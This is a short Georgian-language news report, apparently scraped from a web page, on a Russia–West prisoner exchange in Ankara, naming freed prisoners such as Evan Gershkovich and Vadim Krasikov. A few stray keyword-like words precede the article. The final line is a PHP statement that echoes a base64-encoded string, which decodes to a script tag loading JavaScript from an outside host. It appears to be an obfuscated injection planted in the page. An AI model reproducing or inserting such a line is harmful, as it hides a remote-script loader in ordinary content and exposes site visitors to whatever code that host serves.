celsiusi
ავერსი საქკაბელი

 რუსეთს, აშშ-ს, გერმანიას და დასავლეთის კიდევ სამ ქვეყანას შორის პატიმრების გაცვლის პროცესში, სულ მცირე, 24 ადამიანი მონაწილეობს, მათ შორის რუსეთის რვა მოქალაქე.

ამის შესახებ ინფორმაციას „ბიბისი“ ავრცელებს.

პარალელურად, თურქული მედია იტყობინება, რომ პატიმრების გაცვლა თურქეთის დედაქალაქ ანკარაში მოხდება და ამ პროცესს კოორდინაციას თურქეთის დაზვერვის სამსახური უწევს.

ვრცელდება ინფორმაცია, რომ რუსეთი გაათავისუფლებს „ვოლ სთრით ჯორნალის“ ჟურნალისტს, ევან გერშკოვიჩს, ყოფილ საზღვაო ქვეითს, პოლ ვილანს, „რადიო თავისუფლების“ ჟურნალისტს, ალსუ კურმაშევას, კრემლის ოპონენტს, ვლადიმირ ყარა-მურზას, რუს დისიდენტს, ილია იაშინს და უფლებადამცველ ოლეგ ორლოვს.

თურქული მედია წერს, რომ პატიმრების გაცვლა თურქეთის დროით 19:00 საათზე უნდა დაიწყოს.

ვრცელდება ინფორმაცია, რომ რუსეთთან პატიმართა გაცვლის პროცესში გერმანული საპატიმროდან გათავისუფლდა ვადიმ კრასიკოვი, რომელიც გერმანელმა ოფიციალურმა პირებმა რუსეთის სადაზვერვო სამსახურის პოლკოვნიკად დაასახელეს. ვადიმ კრასიკოვს ბერლინში საქართველოს მოქალაქის, ზელიმხან ხანგოშვილის მკვლელობისთვის სამუდამო პატიმრობა ჰქონდა მისჯილი.

142
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");